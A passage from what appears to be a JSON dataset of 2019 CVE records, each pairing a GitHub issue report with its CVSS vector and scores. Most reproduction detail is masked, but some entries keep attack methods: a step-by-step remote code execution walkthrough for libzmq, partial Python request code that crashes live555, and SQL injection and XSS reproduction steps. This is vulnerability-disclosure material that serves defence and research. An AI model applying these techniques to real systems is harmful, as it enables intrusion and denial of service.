        "Issue_Url_new": "https://github.com/paroxyste/simply-blog/issues/1",
        "Repo_new": "Paroxyste/Simply-Blog",
        "Issue_Created_At": "2019-01-01T09:12:59Z",
        "description": "There might be a SQL inject issus in FILETAG . issus start at line NUMBERTAG to line NUMBERTAG CODETAG We can see intuitively that database queries are not filtered\uff0cso attacker can inject payload into Query directly SUGGEST: i think you can add character filtering to check user input before execute the query",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-3500",
        "Issue_Url_old": "https://github.com/aria2/aria2/issues/1329",
        "Issue_Url_new": "https://github.com/aria2/aria2/issues/1329",
        "Repo_new": "aria2/aria2",
        "Issue_Created_At": "2019-01-01T12:52:33Z",
        "description": "Metadata and potential password leaks via log=. Hi Team, I am using aria2 version NUMBERTAG on NUMBERTAG generic NUMBERTAG Ubuntu NUMBERTAG It was observed that URL's which gets downloaded via APITAG attribute stored sensitive information NUMBERTAG In combination with HTTP authentication a username and password can be part of the URL. APITAG In such case the log file contains password as well, sometimes URL's may contain secret tokens, e.g. private file shares on a file hosting service. In general storing metadata at unexpected places should be avoided NUMBERTAG However, if the above steps are repeated using the below URL the log file does not contains password. APITAG Request team to have a look and validate.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-3501",
        "Issue_Url_old": "https://github.com/Sama34/OUGC-Awards/issues/29",
        "Issue_Url_new": "https://github.com/sama34/ougc-awards/issues/29",
        "Repo_new": "sama34/ougc-awards",
        "Issue_Created_At": "2019-01-02T05:47:24Z",
        "description": "XSS in reason field.. Describe the bug Apparently custom reasons are not sanitized on output. To Reproduce Steps to reproduce the behavior NUMBERTAG Have a mod account level or higher NUMBERTAG Go to Manage Awards in APITAG NUMBERTAG Give an award to a user and input payload for reason. APITAG NUMBERTAG Payload executes when viewing award on FILETAG and user profiles. Expected behavior Such code shouldn't be executed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-3572",
        "Issue_Url_old": "https://github.com/libming/libming/issues/169",
        "Issue_Url_new": "https://github.com/libming/libming/issues/169",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-12-28T10:35:44Z",
        "description": "a heap buffer overflow problem in function APITAG in file PATHTAG I found a a heap buffer overflow problem in function APITAG in file PATHTAG FILETAG PATHTAG verbose in2.dbl FILETAG image data RGB outsize NUMBERTAG size NUMBERTAG unpacked data size t NUMBERTAG byte channel count NUMBERTAG Segmentation fault (core dumped) ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-3573",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/83",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/83",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2019-01-02T08:08:21Z",
        "description": "two bugs in img2sixel and sixel2png. APITAG CODETAG APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-3575",
        "Issue_Url_old": "https://github.com/schettino72/sqla_yaml_fixtures/issues/20",
        "Issue_Url_new": "https://github.com/schettino72/sqla_yaml_fixtures/issues/20",
        "Repo_new": "schettino72/sqla_yaml_fixtures",
        "Issue_Created_At": "2019-01-02T15:02:16Z",
        "description": "APITAG method is vulnerable. import sqla_yaml_fixtures test_str PATHTAG [\"dir\"]' APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-3577",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/9",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/9",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2019-01-02T16:02:56Z",
        "description": "There is a SQL Injection vulnerability. There is a blind sql injection. APITAG is based on APITAG vulnerable code in PATHTAG ERRORTAG exp to get admin password here: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-3580",
        "Issue_Url_old": "https://github.com/OpenRefine/OpenRefine/issues/1927",
        "Issue_Url_new": "https://github.com/openrefine/openrefine/issues/1927",
        "Repo_new": "openrefine/openrefine",
        "Issue_Created_At": "2019-01-02T17:44:47Z",
        "description": "Project import vulnerable to arbitrary file write. Describe the bug The import of a project is prone to a path traversal and thus an arbitrary file write. To Reproduce Steps to reproduce the behavior NUMBERTAG Download FILETAG NUMBERTAG APITAG , APITAG is greated NUMBERTAG Go to APITAG Import Projects NUMBERTAG Choose APITAG NUMBERTAG Import file NUMBERTAG APITAG should show the content of the file. Current Results The first NUMBERTAG bytes are from the file APITAG are chosen as path, not the filename itself. An error is also shown but is not related to the path traversal. Expected behavior Show an error, warn user, do not write file outside of the project folder. Video FILETAG Desktop (please complete the following information): Not important APITAG (please complete the following information): Demo with NUMBERTAG but should work with master Datasets Payload file FILETAG Additional context Please also update dependencies. The ant library is out of date and sloppy (compared to other) handling (tar) archive header. If you have questions, you can reach me at \"niko at sign shiftleft.io\" or URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-3817",
        "Issue_Url_old": "https://github.com/rpm-software-management/libcomps/issues/41",
        "Issue_Url_new": "https://github.com/rpm-software-management/libcomps/issues/41",
        "Repo_new": "rpm-software-management/libcomps",
        "Issue_Created_At": "2019-01-21T16:12:03Z",
        "description": "use after free in comps_objmrtree_unite function. pair is freed in URLTAG but it is accessed again at the next iteration at URLTAG accessing memory that was just recently freed. Valgrind output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-3832",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/456",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/456",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2019-02-07T09:17:20Z",
        "description": "Incomplete fix for CVETAG . Hi, I think the fix for CVETAG in URLTAG is not complete and it is still possible to trigger the same flaw just by adjusting the APITAG a bit. In APITAG : APITAG Loops is defined as an array of NUMBERTAG elements, so reducing APITAG to a NUMBERTAG bit number does not really solve the out of bound read issue. The value should be checked and wrapped to NUMBERTAG not NUMBERTAG bits) or the process terminated immediately because the input is malformed. How to reproduce ERRORTAG FILETAG Extra If the issue is confirmed, I will request a new CVE for it as the old one may have been already fixed in some distributions, which would not get the real fix otherwise.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-3841",
        "Issue_Url_old": "https://github.com/kubevirt/containerized-data-importer/issues/678",
        "Issue_Url_new": "https://github.com/kubevirt/containerized-data-importer/issues/678",
        "Repo_new": "kubevirt/containerized-data-importer",
        "Issue_Created_At": "2019-02-26T21:32:36Z",
        "description": "Registry imports disable TLS. A flaw was identified in the Containerized Data Importer, a component used by Container Native Virtualization. In Containerized Data Importer versions from NUMBERTAG through NUMBERTAG the import from registry feature disabled TLS certificate verification when communicating with container registries. An attacker could use this flaw to impersonate a trusted container registry. All users should upgrade to CDI version NUMBERTAG or later. Affected Components CDI importer container image (kubevirt/cdi importer) Affected Versions CDI NUMBERTAG CDI NUMBERTAG Users of Red Hat Container Native Virtualization are unaffected. Vulnerability Impact Unless explicitly disabled, communication with container registries is expected to be secured with SSL and TLS. In CDI versions affected by this flaw, TLS certificate verification is disabled for all connections to container registries. As a result, content may be imported into a PVC from an inauthentic server. Mitigations The vulnerability can only be triggered by an authenticated kubernetes user who is authorized to create PVCs. To mitigate, do not create PVCs with the APITAG \"registry\"\" annotation and do not create APITAG that use the \"registry\" source. Detection To identify if your CDI deployment is affected perform the following steps: Initiate an import from registry using either a APITAG or a PVC without requesting an insecure connection Locate the importer pod in the namespace where the PVC or APITAG was created Look for a message similar to the following in the logs: APITAG The presence of the parameter APITAG indicates a vulnerable CDI deployment",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.2,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2019-5064",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/15857",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/15857",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2019-11-06T16:00:12Z",
        "description": "Talos security advisory for Opencv (TALOS NUMBERTAG The Cisco Talos team found two security vulnerabilities affecting Opencv APITAG NUMBERTAG As this is a sensitive security issue, this message is to request a point of contact to report the detailed report. Email requests to admin at opencv.org were also sent.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-5310",
        "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/6",
        "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/6",
        "Repo_new": "doublefast/yunucms",
        "Issue_Created_At": "2019-01-04T06:48:58Z",
        "description": "Bug NUMBERTAG Stored Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG The judgment code of the basic settings page is: FILETAG Pass in such a packet here FILETAG See the FILETAG file to see that the site_title parameter has been changed. FILETAG The value in FILETAG was taken directly in FILETAG , resulting in a storage XSS vulnerability. FILETAG APITAG To Reproduce: FILETAG FILETAG FILETAG Fix: Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-5311",
        "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/5",
        "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/5",
        "Repo_new": "doublefast/yunucms",
        "Issue_Created_At": "2019-01-04T03:42:16Z",
        "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an xss vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG NUMBERTAG In the PATHTAG , No filtering to cw in the index( ) function: FILETAG FILETAG FILETAG APITAG To Reproduce: Open below URL in browser which supports flash. url: URLTAG FILETAG Fix: Filter the id parameter",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-5312",
        "Issue_Url_old": "https://github.com/Wechat-Group/WxJava/issues/903",
        "Issue_Url_new": "https://github.com/wechat-group/wxjava/issues/903",
        "Repo_new": "wechat-group/wxjava",
        "Issue_Created_At": "2019-01-04T14:04:31Z",
        "description": "XXE Vulnerability. Hello, i have tested the fix for the XXE vulnerability of the issue NUMBERTAG URLTAG . Unfortunately, the vulnerability is still present in version APITAG , see the image below. FILETAG Additional information on how to prevent such kind of issues can be found on URLTAG Thank you and best regards",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-5421",
        "Issue_Url_old": "https://github.com/plataformatec/devise/issues/4981",
        "Issue_Url_new": "https://github.com/heartcombo/devise/issues/4981",
        "Repo_new": "heartcombo/devise",
        "Issue_Created_At": "2018-11-27T16:02:36Z",
        "description": "Small security issue with :lockable. Environment Ruby any Rails any running a multithreaded server (like puma) Devise NUMBERTAG Current behavior Some pentesters found an issue where our users did not lock (using :lockable), despite running many many attempts to brute force the password. To reproduce, try to login many times at exactly the same time NUMBERTAG attempts within NUMBERTAG milliseconds of each other will not increment the failed_attempts attribute on your user NUMBERTAG times on a busy or slow database. This is a test that describes the behaviour that I would reasonably expect: CODETAG This test will fail in devise NUMBERTAG Expected behavior The issue arises because we read and set failed_attempts in two steps, instead of in one transaction. Below is an excerpt of the method from APITAG , my comments added: ERRORTAG Our workaround we use is something along the lines of: CODETAG which passes the test above. This solution is postgres specific (and also assumes integer ids) so may not be suitable for devise, but the idea stands. Reading and writing from this attribute needs to happen on at least a row level transaction in the database.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-5477",
        "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1915",
        "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1915",
        "Repo_new": "sparklemotion/nokogiri",
        "Issue_Created_At": "2019-07-20T19:40:01Z",
        "description": "placeholder] embargoed security vulnerability. A security vulnerability has been reported via the APITAG Reporting Policy process URLTAG and this issue will be the public record for this vulnerability and the triage and mitigation process.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-5720",
        "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/38",
        "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/38",
        "Repo_new": "frontaccountingerp/fa",
        "Issue_Created_At": "2019-01-07T11:10:06Z",
        "description": "SQL Injection. > APITAG is my first time to chat with people in English. I don't speak much English. Frontaccounting is using function APITAG to escape value. But some variables do not use the function APITAG environment : docker mattrayner/lamp:latest NUMBERTAG Description PATHTAG If I set parameter $reference like \u2018XXXXXX\\\u2019. Single quotes can APITAG I can inject in parameter $type FILETAG APITAG FILETAG PATHTAG FILETAG APITAG FILETAG APITAG FILETAG So parameter $type can be controlled How about parameter $reference? FILETAG FILETAG APITAG FILETAG After that I found some insert statements of table grn_batch. PATHTAG FILETAG PATHTAG FILETAG purchasing/ FILETAG NUMBERTAG FILETAG FILETAG So parameter $reference can be controlled NUMBERTAG Bypass NUMBERTAG PHP switch ($type) The variable $type like NUMBERTAG in here is same as NUMBERTAG dasdsadasda. FILETAG FILETAG NUMBERTAG Mysql Converting a string into an integer has some problems in mysql. FILETAG NUMBERTAG dasdasdasd NUMBERTAG dasdasdasd' FILETAG String and integer can be added NUMBERTAG Mysql has SQL Truncation problem so that \u2018\\\u2019 can be truncated NUMBERTAG POC: Settings such as PATHTAG will report an error, but PATHTAG will not . I noticed that refererence is NUMBERTAG bytes, set the payload to NUMBERTAG bytes like PATHTAG is PATHTAG in the database. I am using FILETAG , not the po_receive_items.php found above. FILETAG CODETAG database: FILETAG FILETAG FILETAG CODETAG The final execution of the sql statement is like this\uff1a ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-5886",
        "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/1",
        "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/1",
        "Repo_new": "gongfuxiang/shopxo",
        "Issue_Created_At": "2019-01-04T08:31:44Z",
        "description": "\u91cd\u88c5\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG PATHTAG FILETAG \u6784\u9020\u5982\u4e0bpost\u8bf7\u6c42 FILETAG APITAG FILETAG \u6700\u5173\u952e\u7684\u5730\u65b9\u662f\u6570\u636e\u5e93\u914d\u7f6e\u6587\u4ef6\u4e5f\u4fee\u6539\u4e86 FILETAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-5887",
        "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/2",
        "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/2",
        "Repo_new": "gongfuxiang/shopxo",
        "Issue_Created_At": "2019-01-04T09:55:55Z",
        "description": "\u540e\u53f0\u4efb\u610f\u6587\u4ef6\u5220\u9664\u6f0f\u6d1e. APITAG APITAG FILETAG \u8fdb\u5165delete\u65b9\u6cd5\u4e2d\uff0c\u5f53\u4e0d\u662fzip\u7ed3\u5c3e\u65f6\u4f1a\u8ba4\u4e3a\u662f\u6587\u4ef6\u5939 FILETAG APITAG FILETAG \u65b9\u6cd5\u4e2d\u53ea\u5bf9\u662f\u4e0d\u662f\u6587\u4ef6\u5939\u505a\u4e86\u6821\u9a8c\uff0c\u6700\u540e\u8fdb\u5165\u4e86rmdir\u65b9\u6cd5\u4e2d \u70b9\u51fb\u5220\u9664 FILETAG \u6293\u5305\u4fee\u6539 FILETAG \u6210\u529f\u5220\u9664 FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6132",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/357",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/357",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-01-10T17:00:31Z",
        "description": "memory leaks in APITAG there is memory leaks in APITAG ./mp NUMBERTAG aac poc /dev/null APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG c NUMBERTAG a5 in APITAG APITAG &) PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG int, APITAG PATHTAG NUMBERTAG e NUMBERTAG cb in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ddaa0 in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG d6aa5 in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG d in APITAG APITAG PATHTAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG e0 in operator new FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6135",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/104",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/104",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-01-11T12:32:48Z",
        "description": "Memeory leak in goose_publisher_example.c. Hi team, Their are multiple memory leaks in APITAG Snip FILETAG CODETAG Memory leaks ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6135",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/103",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/103",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-01-11T10:26:24Z",
        "description": "Memory leaks in mms_mapping.c & mms_value.c. Hi team, Their are multiple memory leaks in APITAG and APITAG Snip FILETAG ERRORTAG Snip FILETAG ERRORTAG Memory leaks ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6136",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/105",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/105",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2019-01-11T12:36:38Z",
        "description": "Memory leak in sv_subscriber.c. Hi team, Their are multiple memory leaks in APITAG Snip FILETAG CODETAG Memory leaks ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6137",
        "Issue_Url_old": "https://github.com/mz-automation/lib60870/issues/39",
        "Issue_Url_new": "https://github.com/mz-automation/lib60870/issues/39",
        "Repo_new": "mz-automation/lib60870",
        "Issue_Created_At": "2019-01-11T12:49:26Z",
        "description": "Memory leak in link_layer.c. Hi team, There is a memory leak in APITAG Snip FILETAG APITAG Memory leak ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-6245",
        "Issue_Url_old": "https://github.com/svgpp/svgpp/issues/70",
        "Issue_Url_new": "https://github.com/svgpp/svgpp/issues/70",
        "Repo_new": "svgpp/svgpp",
        "Issue_Created_At": "2019-01-12T11:41:38Z",
        "description": "4 bugs found in svgpp. bug1: an oob read bug description A type confusion bug lead to out of bound read in PATHTAG APITAG should return a reference to pixfmt_alpha_blend_rgba but instead return some struct that look like a long+string. That is why it crashes when it simply get the member stride. This bug may be used in info leak. poc URLTAG asan URLTAG details The crash happened in PATHTAG URLTAG Looks like type confusion. APITAG should return a reference to pixfmt_alpha_blend_rgba but instead return some struct that look like a long+string. That is why it crashes when it simply get the member stride This is a out of bound read bug. bug2: a heap buffer overflow bug description An heap buffer overflow bug in svgpp_agg_render which may lead to code excution. In the render_scanlines_aa_solid function, the blend_hline function is called repeatedly multiple times. blend_hline is equivalent to the process of loop writing. Each call will write a piece of heap data, and multiple calls will overwrite the data in the heap. poc URLTAG asan URLTAG details here is a heap overflow here, the specific function call process is as follows: APITAG > APITAG Multiple calls in a loop > APITAG > APITAG In the render_scanlines_aa_solid function, the blend_hline function is called repeatedly multiple times. blend_hline is equivalent to the process of loop writing. Each call will write a piece of heap data, and multiple calls will overwrite the data in the heap. URLTAG In the render_scanlines_aa_solid function, there is no explicit restriction on the 'for' loop. After calling blend_hline multiple times, it causes a heap overflow. This bug is also found in agg_pixfmt_rgb.h, agg_pixfmt_rgb_packed.h, agg_pixfmt_rgba.h, agg_pixfmt_transposer.h. bug3: a stack overflow bug description in the function agg::cell_aa::not_equal, dx is assigned to NUMBERTAG if dx >= dx_limit, which is NUMBERTAG APITAG = dx_limit, which is NUMBERTAG poly_subpixel_shift). This function will call itself recursively. There will be a sitaution when NUMBERTAG always bigger than dx_limit during the recursion Thats how the stack overflow happened. bug4: a oob read bug description After callng gil::get_color function in the boost library, the return code is used as an address. Thus it caused an Violation Access. This may lead to an out of bound read. poc URLTAG asan URLTAG details CODETAG After callng gil::get_color function in the boost library, the return code is used as an address. Thus it caused an Violation Access.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6250",
        "Issue_Url_old": "https://github.com/zeromq/libzmq/issues/3351",
        "Issue_Url_new": "https://github.com/zeromq/libzmq/issues/3351",
        "Repo_new": "zeromq/libzmq",
        "Issue_Created_At": "2019-01-08T14:15:33Z",
        "description": "Remote code execution vulnerability. Bug details In APITAG , the attacker can provide an APITAG of his choosing: ERRORTAG Then, in APITAG , a comparison is performed to check if this peer supplied APITAG is within the bounds of the currently allocated block of memory: ERRORTAG This is inadequate because a very large APITAG will overflow the pointer ( APITAG ). In other words, the comparison will compute as 'false' even though APITAG bytes don't fit in the currently allocated block. Exploit details Now that APITAG has been set to a very high value, the attacker is allowed to send this amount of bytes, and libzmq will copy it to its internal buffer without any further checks. This means that it's possible to write beyond the bounds of the allocated space. However, for the exploit this is not necessary to corrupt memory beyond the buffer proper. As it turns out, the space the attacker is writing to is immediately followed by a APITAG block: ERRORTAG So the memory layout is such that the receive buffer is immediately followed by data , then size , then ffn , then hint , then refcnt . Note that the receive buffer + the APITAG is a single, solid block of memory; by overwriting beyond the designated receive buffer's bounds, no dlmalloc state variables in memory (like bk , fd ) are corrupted (or, in other words, it wouldn't trigger APITAG This means that the attacker can overwrite all these members with arbitrary values. ffn is a function pointer, that upon connection closure, is called with two parameters, data and hint . This means the attacker can call an arbitrary function/address with two arbitrary parameters. In my exploit, I set ffn to the address of strcpy , set the first parameter to somewhere in the executable's .data section, and the second parameter to the address of the character I want to write followed by a NULL character. So for instance, if i want to write a 'g' character, I search the binary for an occurrence of 'g NUMBERTAG and use this address as the second value to my strcpy call. For each character of the command I want to execute on the remote machine, I make a separate request to write that character to the .data section. So if I want to execute 'gnome calculator', I first write a 'g', then a 'n', then an 'o', and so on, until the full 'gnome calculator' string is written to .data. In the next request, I overwrite the 'data' member of APITAG with the address of the .data section (where now APITAG resides), set the ffn member to the system libc function, and hint to NULL. In effect, this calls APITAG , by which this command is executed on the remote machine. Exploit The following is a self exploit, that demonstrates the exploit flow as explained above. ERRORTAG Notes Crucial to this exploit is knowing certain addresses, like strcpy and system , though the address of strcpy could be replaced with any executable location that contains APITAG or anything else that moves APITAG to APITAG , and system might be replaced with code that executes the string at rsi . I did not find any other vulnerabilities in libzmq, but if there is any information leaking vulnerability in libzmq, or the application that uses it, that would allow the attacker to calculate proper code offsets, this would defeat ASLR. Resolution Resolution of this vulnerability must consist of preventing pointer arithmetic overflow in APITAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-6256",
        "Issue_Url_old": "https://github.com/rgaufman/live555/issues/19",
        "Issue_Url_new": "https://github.com/rgaufman/live555/issues/19",
        "Repo_new": "rgaufman/live555",
        "Issue_Created_At": "2019-01-14T02:37:30Z",
        "description": "There is a Denial of service attack issue that can cause program to crash in LIVE NUMBERTAG Media Server version NUMBERTAG ISSUE DESCRIPTION ================= The project website : URLTAG I found a new way to make APITAG crash in lastest version NUMBERTAG when RTSP over HTTP tunneling is supported. I only need to send two HTTP requests in one TCP connection. The problem occurrs in APITAG , it calls APITAG If I send a HTTP GET packet with a specific APITAG firstly, then I send a HTTP POST packet with this APITAG in the same TCP connection. APITAG will call a error virtual function pointer in APITAG APITAG and the pointer value comes from heap which may control. Attack APITAG python code\uff1a from socket import target_ip = REMOTE_SERVER_IP target_port NUMBERTAG or NUMBERTAG tcp = socket(AF_INET,SOCK_STREAM) APITAG http_request_GET = '''GET / PATHTAG x sessioncookie: AAAAABBBBBB Accept: application/text ''' http_request_POST = '''POST / PATHTAG x sessioncookie: AAAAABBBBBB Accept: application/text This is test data ''' APITAG data = APITAG APITAG data = APITAG APITAG You can just build a test demo according to URLTAG and attack the bin APITAG for verification. IMPACT ====== It will cause dos attack and potential remote command execution in version NUMBERTAG I verified) , even all earlier versions APITAG is just my unverified guess).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
